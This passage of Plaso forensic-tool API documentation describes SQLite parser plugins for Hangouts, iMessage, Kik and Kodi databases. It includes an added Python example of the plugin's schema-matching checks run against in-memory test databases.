SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'blocked_people': 'CREATE TABLE blocked_people (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY, participant_row_id INT, participant_type INT, conversation_id TEXT, sequence INT, active INT, invitation_status INT DEFAULT(0), UNIQUE (conversation_id,participant_row_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY (participant_row_id) REFERENCES participants(_id))', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY, conversation_id TEXT, conversation_type INT, latest_message_timestamp INT DEFAULT(0), latest_message_expiration_timestamp INT, metadata_present INT,notification_level INT, name TEXT, generated_name TEXT, snippet_type INT, snippet_text TEXT, snippet_image_url TEXT, snippet_author_gaia_id TEXT, snippet_author_chat_id TEXT, snippet_message_row_id INT, snippet_selector INT, snippet_status INT, snippet_new_conversation_name TEXT, snippet_participant_keys TEXT, snippet_sms_type TEXT, previous_latest_timestamp INT, status INT, view INT, inviter_gaia_id TEXT, inviter_chat_id TEXT, inviter_affinity INT, is_pending_leave INT, account_id INT, is_otr INT, packed_avatar_urls TEXT, self_avatar_url TEXT, self_watermark INT DEFAULT(0), chat_watermark INT DEFAULT(0), hangout_watermark INT DEFAULT(0), is_draft INT, sequence_number INT, call_media_type INT DEFAULT(0), has_joined_hangout INT, has_chat_notifications DEFAULT(0),has_video_notifications DEFAULT(0),last_hangout_event_time INT, draft TEXT, otr_status INT, otr_toggle INT, last_otr_modification_time INT, continuation_token BLOB, continuation_event_timestamp INT, has_oldest_message INT DEFAULT(0), sort_timestamp INT, 
first_peak_scroll_time INT, first_peak_scroll_to_message_timestamp INT, second_peak_scroll_time INT, second_peak_scroll_to_message_timestamp INT, conversation_hash BLOB, disposition INT DEFAULT(0), has_persistent_events INT DEFAULT(-1), transport_type INT DEFAULT(1), default_transport_phone TEXT, sms_service_center TEXT, is_temporary INT DEFAULT (0), sms_thread_id INT DEFAULT (-1), chat_ringtone_uri TEXT, hangout_ringtone_uri TEXT, snippet_voicemail_duration INT DEFAULT (0), share_count INT DEFAULT(0), has_unobserved TEXT, last_share_timestamp INT DEFAULT(0), gls_status INT DEFAULT(0), gls_link TEXT, is_guest INT DEFAULT(0), UNIQUE (conversation_id ))', 'dismissed_contacts': 'CREATE TABLE dismissed_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'event_suggestions': 'CREATE TABLE event_suggestions (_id INTEGER PRIMARY KEY, conversation_id TEXT, event_id TEXT, suggestion_id TEXT, timestamp INT, expiration_time_usec INT, type INT, gem_asset_url STRING, gem_horizontal_alignment INT, matched_message_substring TEXT, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,suggestion_id) ON CONFLICT REPLACE)', 'merge_keys': 'CREATE TABLE merge_keys (_id INTEGER PRIMARY KEY, conversation_id TEXT, merge_key TEXT, UNIQUE (conversation_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE )', 'merged_contact_details': 'CREATE TABLE merged_contact_details (_id INTEGER PRIMARY KEY, merged_contact_id INT, lookup_data_type INT, lookup_data TEXT, lookup_data_standardized TEXT, lookup_data_search TEXT, lookup_data_label TEXT, needs_gaia_ids_resolved INT DEFAULT (1), is_hangouts_user INT DEFAULT (0), gaia_id TEXT, avatar_url TEXT, display_name TEXT, last_checked_ts INT DEFAULT (0), lookup_data_display 
TEXT, detail_affinity_score REAL DEFAULT (0.0), detail_logging_id TEXT, is_in_viewer_dasher_domain INT DEFAULT (0), FOREIGN KEY (merged_contact_id) REFERENCES merged_contacts(_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'merged_contacts': 'CREATE TABLE merged_contacts (_id INTEGER PRIMARY KEY, contact_lookup_key TEXT, contact_id INT, raw_contact_id INT, display_name TEXT, avatar_url TEXT, is_frequent INT DEFAULT (0), is_favorite INT DEFAULT (0), contact_source INT DEFAULT(0), frequent_order INT, person_logging_id TEXT, person_affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))', 'messages': 'CREATE TABLE messages (_id INTEGER PRIMARY KEY, message_id TEXT, message_type INT, conversation_id TEXT, author_chat_id TEXT, author_gaia_id TEXT, text TEXT, timestamp INT, delete_after_read_timetamp INT, status INT, type INT, local_url TEXT, remote_url TEXT, attachment_content_type TEXT, width_pixels INT, height_pixels INT, stream_id TEXT, image_id TEXT, album_id TEXT, latitude DOUBLE, longitude DOUBLE, address ADDRESS, notification_level INT, expiration_timestamp INT, notified_for_failure INT DEFAULT(0), off_the_record INT DEFAULT(0), transport_type INT NOT NULL DEFAULT(1), transport_phone TEXT, external_ids TEXT, sms_timestamp_sent INT DEFAULT(0), sms_priority INT DEFAULT(0), sms_message_size INT DEFAULT(0), mms_subject TEXT, sms_raw_sender TEXT, sms_raw_recipients TEXT, persisted INT DEFAULT(1), sms_message_status INT DEFAULT(-1), sms_type INT DEFAULT(-1), stream_url TEXT, attachment_target_url TEXT, attachment_name TEXT, image_rotation INT DEFAULT (0), new_conversation_name TEXT, participant_keys TEXT, forwarded_mms_url TEXT, forwarded_mms_count INT DEFAULT(0), attachment_description TEXT, attachment_target_url_description TEXT, attachment_target_url_name TEXT, attachment_blob_data BLOB,attachment_uploading_progress INT DEFAULT(0), sending_error INT DEFAULT(0), stream_expiration INT, voicemail_length INT DEFAULT (0), call_media_type INT DEFAULT(0), 
last_seen_timestamp INT DEFAULT(0), observed_status INT DEFAULT(2), receive_type INT DEFAULT(0), init_timestamp INT DEFAULT(0), in_app_msg_latency INT DEFAULT(0), notified INT DEFAULT(0), alert_in_conversation_list INT DEFAULT(0), attachments BLOB, is_user_mentioned INT DEFAULT(0), local_id TEXT, request_task_row_id INT DEFAULT(-1), FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,message_id) ON CONFLICT REPLACE)', 'mms_notification_inds': 'CREATE TABLE mms_notification_inds (_id INTEGER PRIMARY KEY, content_location TEXT, transaction_id TEXT, from_address TEXT, message_size INT DEFAULT(0), expiry INT)', 'multipart_attachments': 'CREATE TABLE multipart_attachments (_id INTEGER PRIMARY KEY, message_id TEXT, conversation_id TEXT, url TEXT, content_type TEXT, width INT, height INT, FOREIGN KEY (message_id, conversation_id) REFERENCES messages(message_id, conversation_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'participant_email_fts': 'CREATE VIRTUAL TABLE participant_email_fts USING fts4(content="merged_contact_details", gaia_id,lookup_data)', 'participant_email_fts_docsize': "CREATE TABLE 'participant_email_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participant_email_fts_segdir': "CREATE TABLE 'participant_email_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participant_email_fts_segments': "CREATE TABLE 'participant_email_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participant_email_fts_stat': "CREATE TABLE 'participant_email_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'participants': "CREATE TABLE participants (_id INTEGER PRIMARY KEY, participant_type INT DEFAULT 1, gaia_id TEXT, chat_id TEXT, phone_id TEXT, circle_id TEXT, first_name TEXT, full_name TEXT, fallback_name TEXT, profile_photo_url TEXT, batch_gebi_tag STRING DEFAULT('-1'), blocked INT DEFAULT(0), 
in_users_domain BOOLEAN, UNIQUE (circle_id) ON CONFLICT REPLACE, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)", 'participants_fts': 'CREATE VIRTUAL TABLE participants_fts USING fts4(content="participants",gaia_id,full_name)', 'participants_fts_docsize': "CREATE TABLE 'participants_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participants_fts_segdir': "CREATE TABLE 'participants_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participants_fts_segments': "CREATE TABLE 'participants_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participants_fts_stat': "CREATE TABLE 'participants_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'presence': 'CREATE TABLE presence (_id INTEGER PRIMARY KEY, gaia_id TEXT NOT NULL, reachable INT DEFAULT(0), reachable_time INT DEFAULT(0), available INT DEFAULT(0), available_time INT DEFAULT(0), status_message TEXT, status_message_time INT DEFAULT(0), call_type INT DEFAULT(0), call_type_time INT DEFAULT(0), device_status INT DEFAULT(0), device_status_time INT DEFAULT(0), last_seen INT DEFAULT(0), last_seen_time INT DEFAULT(0), location BLOB, location_time INT DEFAULT(0), UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'recent_calls': 'CREATE TABLE recent_calls (_id INTEGER PRIMARY KEY, normalized_number TEXT NOT NULL, phone_number TEXT, contact_id TEXT, call_timestamp INT, call_type INT, contact_type INT, call_rate TEXT, is_free_call BOOLEAN)', 'search': 'CREATE TABLE search (search_key TEXT NOT NULL,continuation_token TEXT,PRIMARY KEY (search_key))', 'sticker_albums': 'CREATE TABLE sticker_albums (album_id TEXT NOT NULL, title TEXT, cover_photo_id TEXT, last_used INT DEFAULT(0), PRIMARY KEY (album_id))', 'sticker_photos': 'CREATE TABLE sticker_photos (photo_id TEXT NOT NULL, album_id TEXT NOT NULL, url TEXT NOT NULL, file_name TEXT, last_used INT DEFAULT(0), PRIMARY KEY (photo_id), FOREIGN KEY (album_id) 
REFERENCES sticker_albums(album_id) ON DELETE CASCADE)', 'suggested_contacts': 'CREATE TABLE suggested_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, first_name TEXT, packed_circle_ids TEXT, profile_photo_url TEXT, sequence INT, suggestion_type INT, logging_id TEXT, affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))'}]
plaso.parsers.sqlite_plugins.imessage module
SQLite parser plugin for MacOS and iOS iMessage database files.
class plaso.parsers.sqlite_plugins.imessage.IMessageEventData
Bases: plaso.containers.events.EventData
iMessage and SMS event data.
attachment_location – location of the attachment.
Type str
imessage_id – mobile number or email address the message was sent to or received from.
Type str
message_type – value to indicate the message was sent (1) or received (0).
Type int
read_receipt – True if the message read receipt was received.
Type bool
service – service, which is either SMS or iMessage.
Type str
text – content of the message.
Type str
DATA_TYPE = 'imessage:event:chat'
class plaso.parsers.sqlite_plugins.imessage.IMessagePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS and iOS iMessage database files.
The iMessage database file is typically stored in: chat.db, sms.db
DATA_FORMAT = 'MacOS and iOS iMessage database (chat.db, sms.db) file'
NAME = 'imessage'
ParseMessageRow(parser_mediator, query, row, **unused_kwargs)
Parses a message row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT m.date, m.ROWID, h.id AS imessage_id, m.is_read AS read_receipt, m.is_from_me AS message_type, m.service, a.filename AS"attachment_location", m.text FROM message AS m JOIN handle AS h ON h.ROWID = m.handle_id LEFT OUTER JOIN message_attachment_join AS maj ON m.ROWID = maj.message_id LEFT OUTER JOIN attachment AS a ON maj.attachment_id = a.ROWID', 'ParseMessageRow')]
REQUIRED_STRUCTURE = {'attachment': frozenset({'ROWID', 'filename'}), 'handle': frozenset({'ROWID', 'id'}), 'message': frozenset({'ROWID', 'date', 'handle_id', 'is_from_me', 'is_read', 'service', 'text'}), 'message_attachment_join': frozenset({'attachment_id', 'message_id'})}
SCHEMAS = [{'_SqliteDatabaseProperties': 'CREATE TABLE _SqliteDatabaseProperties (key TEXT, value TEXT, UNIQUE(key))', 'attachment': 'CREATE TABLE attachment (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, created_date INTEGER DEFAULT 0, start_date INTEGER DEFAULT 0, filename TEXT, uti TEXT, mime_type TEXT, transfer_state INTEGER DEFAULT 0, is_outgoing INTEGER DEFAULT 0, user_info BLOB, transfer_name TEXT, total_bytes INTEGER DEFAULT 0)', 'chat': 'CREATE TABLE chat (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, style INTEGER, state INTEGER, account_id TEXT, properties BLOB, chat_identifier TEXT, service_name TEXT, room_name TEXT, account_login TEXT, is_archived INTEGER DEFAULT 0, last_addressed_handle TEXT, display_name TEXT, group_id TEXT, is_filtered INTEGER, successful_query INTEGER)', 'chat_handle_join': 'CREATE TABLE chat_handle_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, handle_id INTEGER REFERENCES handle (ROWID) ON DELETE CASCADE, UNIQUE(chat_id, handle_id))', 'chat_message_join': 'CREATE TABLE chat_message_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, PRIMARY KEY (chat_id, message_id))', 'deleted_messages': 'CREATE TABLE deleted_messages (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, guid TEXT NOT NULL)', 'handle': 'CREATE TABLE handle (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, id TEXT NOT NULL, country TEXT, service TEXT NOT NULL, uncanonicalized_id TEXT, UNIQUE (id, service) )', 'message': 'CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, text TEXT, replace INTEGER DEFAULT 0, service_center TEXT, handle_id INTEGER DEFAULT 0, subject TEXT, country TEXT, attributedBody BLOB, version INTEGER DEFAULT 0, type INTEGER DEFAULT 0, service TEXT, account TEXT, account_guid TEXT, error INTEGER DEFAULT 0, date INTEGER, date_read INTEGER, date_delivered INTEGER, 
is_delivered INTEGER DEFAULT 0, is_finished INTEGER DEFAULT 0, is_emote INTEGER DEFAULT 0, is_from_me INTEGER DEFAULT 0, is_empty INTEGER DEFAULT 0, is_delayed INTEGER DEFAULT 0, is_auto_reply INTEGER DEFAULT 0, is_prepared INTEGER DEFAULT 0, is_read INTEGER DEFAULT 0, is_system_message INTEGER DEFAULT 0, is_sent INTEGER DEFAULT 0, has_dd_results INTEGER DEFAULT 0, is_service_message INTEGER DEFAULT 0, is_forward INTEGER DEFAULT 0, was_downgraded INTEGER DEFAULT 0, is_archive INTEGER DEFAULT 0, cache_has_attachments INTEGER DEFAULT 0, cache_roomnames TEXT, was_data_detected INTEGER DEFAULT 0, was_deduplicated INTEGER DEFAULT 0, is_audio_message INTEGER DEFAULT 0, is_played INTEGER DEFAULT 0, date_played INTEGER, item_type INTEGER DEFAULT 0, other_handle INTEGER DEFAULT 0, group_title TEXT, group_action_type INTEGER DEFAULT 0, share_status INTEGER DEFAULT 0, share_direction INTEGER DEFAULT 0, is_expirable INTEGER DEFAULT 0, expire_state INTEGER DEFAULT 0, message_action_type INTEGER DEFAULT 0, message_source INTEGER DEFAULT 0)', 'message_attachment_join': 'CREATE TABLE message_attachment_join (message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, attachment_id INTEGER REFERENCES attachment (ROWID) ON DELETE CASCADE, UNIQUE(message_id, attachment_id))'}]
plaso.parsers.sqlite_plugins.interface module
Interface for SQLite database file parser plugins.
class plaso.parsers.sqlite_plugins.interface.SQLitePlugin
Bases: plaso.parsers.plugins.BasePlugin
SQLite parser plugin.
CheckSchema(database)
Checks the schema of a database with that defined in the plugin.
Parameters database (SQLiteDatabase) – database.
Returns
True if the schema of the database matches that defined by the plugin, or False if the schemas do not match or no schema is defined by the plugin.
Return type bool
DATA_FORMAT = 'SQLite database file'
NAME = 'sqlite_plugin'
Process(parser_mediator, cache=None, database=None, **unused_kwargs)
Determine if this is the right plugin for this database.
This function takes a SQLiteDatabase object and compares the list of required table and column names against those in the database. If all the table and column names defined in REQUIRED_STRUCTURE are present in the database then this plugin is considered to be the correct plugin to produce events.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• cache (Optional[SQLiteCache]) – cache.
• database (Optional[SQLiteDatabase]) – database.
Raises ValueError – If the database or cache value are missing.
QUERIES = []
REQUIRED_STRUCTURE = {}
REQUIRES_SCHEMA_MATCH = False
SCHEMAS = []
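Added example, not Plaso's own implementation: the two checks described above, the REQUIRED_STRUCTURE subset test of Process() and the exact schema comparison of CheckSchema(), run against in-memory databases built from the Kodi plugin definition that appears later on this page. The function names, the schema subset and the sample rows are constructed for the example.

```python
"""Plugin-selection checks as described for SQLitePlugin.Process() and
CheckSchema(), demonstrated with the Kodi MyVideos plugin definition.
Added example, not Plaso's own code; all function names are hypothetical."""
import sqlite3

# From the page: the Kodi plugin's REQUIRED_STRUCTURE and its query.
KODI_REQUIRED_STRUCTURE = {
    'files': frozenset({'idFile', 'lastPlayed', 'playCount', 'strFilename'}),
}
KODI_QUERY = 'SELECT idFile, strFilename, playCount, lastPlayed FROM files'

# Constructed subset of the Kodi SCHEMAS entry: only the 'files' table, so
# that an exact schema comparison can succeed on the small test database.
KODI_SCHEMAS_SUBSET = [{
    'files': ('CREATE TABLE files ( idFile integer primary key, idPath integer, '
              'strFilename text, playCount integer, lastPlayed text, dateAdded text)'),
}]


def table_columns(connection):
    """Return {table_name: set_of_column_names} for every table in the file."""
    tables = {}
    names = connection.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    for (name,) in names:
        quoted = name.replace('"', '""')
        info = connection.execute(f'PRAGMA table_info("{quoted}")').fetchall()
        tables[name] = {column[1] for column in info}   # column[1] is the name
    return tables


def required_structure_matches(connection, required_structure):
    """The Process() rule: every required table must exist and must contain
    every required column.  Extra tables and columns are ignored, and a table
    mapped to an empty frozenset (as blocked_people is for Hangouts) only has
    to exist."""
    tables = table_columns(connection)
    return all(
        table in tables and columns <= tables[table]
        for table, columns in required_structure.items())


def schema_matches(connection, schemas):
    """The CheckSchema() rule: the database's CREATE TABLE statements must
    equal one of the plugin's known schema dicts exactly; False when the
    plugin defines no schema at all."""
    if not schemas:
        return False
    actual = dict(connection.execute(
        "SELECT name, sql FROM sqlite_master WHERE type = 'table'").fetchall())
    return any(known == actual for known in schemas)


def fetch_rows(connection, query):
    """Run a plugin query; these are the rows a Parse...Row callback receives."""
    return connection.execute(query).fetchall()


def build_kodi_database():
    """Constructed in-memory stand-in for a Kodi MyVideos.db with two rows."""
    connection = sqlite3.connect(':memory:')
    connection.execute(KODI_SCHEMAS_SUBSET[0]['files'])
    connection.executemany(
        'INSERT INTO files (idFile, idPath, strFilename, playCount, lastPlayed, '
        'dateAdded) VALUES (?, ?, ?, ?, ?, ?)',
        [(1, 1, 'intro.mkv', 3, '2020-10-07 12:00:00', '2020-10-01 09:30:00'),
         (2, 1, 'talk.mp4', 0, None, '2020-10-05 18:15:00')])
    connection.commit()
    return connection


def build_lookalike_database():
    """Constructed database whose 'files' table lacks lastPlayed, so the Kodi
    plugin must reject it even though the table name matches."""
    connection = sqlite3.connect(':memory:')
    connection.execute(
        'CREATE TABLE files (idFile integer primary key, strFilename text, '
        'playCount integer)')
    connection.commit()
    return connection


def main():
    for label, connection in (('kodi', build_kodi_database()),
                              ('lookalike', build_lookalike_database())):
        structure_ok = required_structure_matches(connection, KODI_REQUIRED_STRUCTURE)
        schema_ok = schema_matches(connection, KODI_SCHEMAS_SUBSET)
        print(f'{label}: required structure {structure_ok}, exact schema {schema_ok}')
        if structure_ok:
            for row in fetch_rows(connection, KODI_QUERY):
                print('  row:', row)


if __name__ == '__main__':
    main()
```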
plaso.parsers.sqlite_plugins.kik_ios module
SQLite parser plugin for iOS Kik messenger database files.
class plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventData
Bases: plaso.containers.events.EventData
Kik message event data.
body – content of the message.
Type str
message_status – message status, such as: read, unread, not sent, delivered, etc.
Type str
message_type – message type, either Sent or Received.
Type str
username – unique username of the sender or receiver.
Type str
DATA_TYPE = 'ios:kik:messaging'
class plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for iOS Kik messenger database files.
The iOS Kik messenger database file is typically stored in: kik.sqlite
DATA_FORMAT = 'iOS Kik messenger SQLite database (kik.sqlite) file'
NAME = 'kik_messenger'
ParseMessageRow(parser_mediator, query, row, **unused_kwargs)
Parses a message row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT a.Z_PK AS id, b.ZUSERNAME, b.ZDISPLAYNAME,a.ZRECEIVEDTIMESTAMP, a.ZSTATE, a.ZTYPE, a.ZBODY FROM ZKIKMESSAGE a JOIN ZKIKUSER b ON b.ZEXTRA = a.ZUSER', 'ParseMessageRow')]
REQUIRED_STRUCTURE = {'ZKIKMESSAGE': frozenset({'ZBODY', 'ZRECEIVEDTIMESTAMP', 'ZSTATE', 'ZTYPE', 'ZUSER', 'Z_PK'}), 'ZKIKUSER': frozenset({'ZDISPLAYNAME', 'ZEXTRA', 'ZUSERNAME'})}
SCHEMAS = [{'Z_3MESSAGES': 'CREATE TABLE Z_3MESSAGES ( Z_3CHAT INTEGER, Z_5MESSAGES INTEGER, PRIMARY KEY (Z_3CHAT, Z_5MESSAGES) )', 'Z_6ADMINSINVERSE': 'CREATE TABLE Z_6ADMINSINVERSE ( Z_6ADMINS INTEGER, Z_6ADMINSINVERSE INTEGER, PRIMARY KEY (Z_6ADMINS, Z_6ADMINSINVERSE) )', 'Z_6BANSINVERSE': 'CREATE TABLE Z_6BANSINVERSE ( Z_6BANS INTEGER, Z_6BANSINVERSE INTEGER, PRIMARY KEY (Z_6BANS, Z_6BANSINVERSE) )', 'Z_6MEMBERS': 'CREATE TABLE Z_6MEMBERS ( Z_6MEMBERSINVERSE INTEGER, Z_6MEMBERS INTEGER, PRIMARY KEY (Z_6MEMBERSINVERSE, Z_6MEMBERS) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)', 'ZKIKATTACHMENT': 'CREATE TABLE ZKIKATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZRETRYCOUNT INTEGER, ZSTATE INTEGER, ZTYPE INTEGER, ZEXTRA INTEGER, ZMESSAGE INTEGER, ZLASTACCESSTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZCONTENT VARCHAR )', 'ZKIKATTACHMENTEXTRA': 'CREATE TABLE ZKIKATTACHMENTEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZATTACHMENT INTEGER, ZENCRYPTIONKEY BLOB )', 'ZKIKCHAT': 'CREATE TABLE ZKIKCHAT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZDRAFTMESSAGE INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZUSER INTEGER, ZDATEUPDATED TIMESTAMP )', 'ZKIKCHATEXTRA': 'CREATE TABLE ZKIKCHATEXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCHAT INTEGER, ZLASTSEENMESSAGE INTEGER, ZMUTEDTIMESTAMP TIMESTAMP )', 'ZKIKMESSAGE': 'CREATE TABLE ZKIKMESSAGE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZSTATE INTEGER, ZSYSTEMSTATE INTEGER, ZTYPE INTEGER, ZCHATEXTRA INTEGER, ZDRAFTMESSAGECHAT INTEGER, ZLASTMESSAGECHAT INTEGER, ZLASTMESSAGEUSER INTEGER, ZUSER INTEGER, ZRECEIVEDTIMESTAMP TIMESTAMP, ZTIMESTAMP TIMESTAMP, ZBODY VARCHAR, 
ZSTANZAID VARCHAR, ZRENDERINSTRUCTIONSET BLOB )', 'ZKIKUSER': 'CREATE TABLE ZKIKUSER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZADDRESSBOOKID INTEGER, ZFLAGS INTEGER, ZINTERNALID INTEGER, ZPRESENCE INTEGER, ZTYPE INTEGER, ZCHATUSER INTEGER, ZEXTRA INTEGER, ZLASTMESSAGE INTEGER, ZDISPLAYNAME VARCHAR, ZDISPLAYNAMEASCII VARCHAR, ZEMAIL VARCHAR, ZFIRSTNAME VARCHAR, ZGROUPTAG VARCHAR, ZJID VARCHAR, ZLASTNAME VARCHAR, ZPPTIMESTAMP VARCHAR, ZPPURL VARCHAR, ZSTATUS VARCHAR, ZUSERNAME VARCHAR, ZCONTENTLINKSPROTODATA BLOB )', 'ZKIKUSEREXTRA': 'CREATE TABLE ZKIKUSEREXTRA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZLOCALFLAGS INTEGER, ZUSER INTEGER, ZPUBLICMESSAGINGKEY BLOB )'}]
Plaso (log2timeline), Release 20201007
plaso.parsers.sqlite_plugins.kodi module
SQLite parser plugin for Kodi videos database files.
class plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Kodi videos database files.
The Kodi videos database file is typically stored in: MyVideos.db
DATA_FORMAT = 'Kodi videos SQLite database (MyVideos.db) file'
NAME = 'kodi'
ParseVideoRow(parser_mediator, query, row, **unused_kwargs)
Parses a Video row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT idFile, strFilename, playCount, lastPlayed FROM files', 'ParseVideoRow')]
REQUIRED_STRUCTURE = {'files': frozenset({'idFile', 'lastPlayed', 'playCount', 'strFilename'})}
SCHEMAS = [{'actor': 'CREATE TABLE actor ( actor_id INTEGER PRIMARY KEY, name TEXT, art_urls TEXT )', 'actor_link': 'CREATE TABLE actor_link(actor_id INTEGER, media_id INTEGER, media_type TEXT, role TEXT, cast_order INTEGER)', 'art': 'CREATE TABLE art(art_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, type TEXT, url TEXT)', 'bookmark': 'CREATE TABLE bookmark ( idBookmark integer primary key, idFile integer, timeInSeconds double, totalTimeInSeconds double, thumbNailImage text, player text, playerState text, type integer)', 'country': 'CREATE TABLE country ( country_id integer primary key, name TEXT)', 'country_link': 'CREATE TABLE country_link (country_id integer, media_id integer, media_type TEXT)', 'director_link': 'CREATE TABLE director_link(actor_id INTEGER, media_id INTEGER, media_type TEXT)', 'episode': 'CREATE TABLE episode ( idEpisode integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 varchar(24),c13 varchar(24),c14 text,c15 text,c16 text,c17 varchar(24),c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idShow integer, userrating integer, idSeason integer)', 'files': 'CREATE TABLE files ( idFile integer primary key, idPath integer, strFilename text, playCount integer, lastPlayed text, dateAdded text)', 'genre': 'CREATE TABLE genre ( genre_id integer primary key, name TEXT)', 'genre_link': 'CREATE TABLE genre_link (genre_id integer, media_id integer, media_type TEXT)', 'movie': 'CREATE TABLE movie ( idMovie integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, idSet integer, userrating integer, premiered text)', 'movielinktvshow': 'CREATE TABLE movielinktvshow ( idMovie integer, IdShow integer)', 'musicvideo': 'CREATE TABLE musicvideo ( idMVideo 
integer primary key, idFile integer,c00 text,c01 text,c02 text,c03 text,c04 text,c05 text,c06 text,c07 text,c08 text,c09 text,c10 text,c11 text,c12 text,c13 text,c14 text,c15 text,c16 text,c17 text,c18 text,c19 text,c20 text,c21 text,c22 text,c23 text, userrating integer, premiered text)', 'path': 'CREATE TABLE path ( idPath integer primary key, strPath text, strContent text, strScraper text, strHash text, scanRecursive integer, useFolderNames bool, strSettings text, noUpdate bool, exclude bool, dateAdded text, idParentPath integer)', 'rating': 'CREATE TABLE rating (rating_id INTEGER PRIMARY KEY, media_id INTEGER, media_type TEXT, rating_type TEXT, rating FLOAT, votes INTEGER)', 'seasons': 'CREATE TABLE seasons ( idSeason integer primary key, idShow integer, season integer, name text, userrating integer)', 'sets': 'CREATE TABLE sets ( idSet integer primary key, strSet text, strOverview text)', 'settings': 'CREATE TABLE settings ( idFile integer, Deinterlace 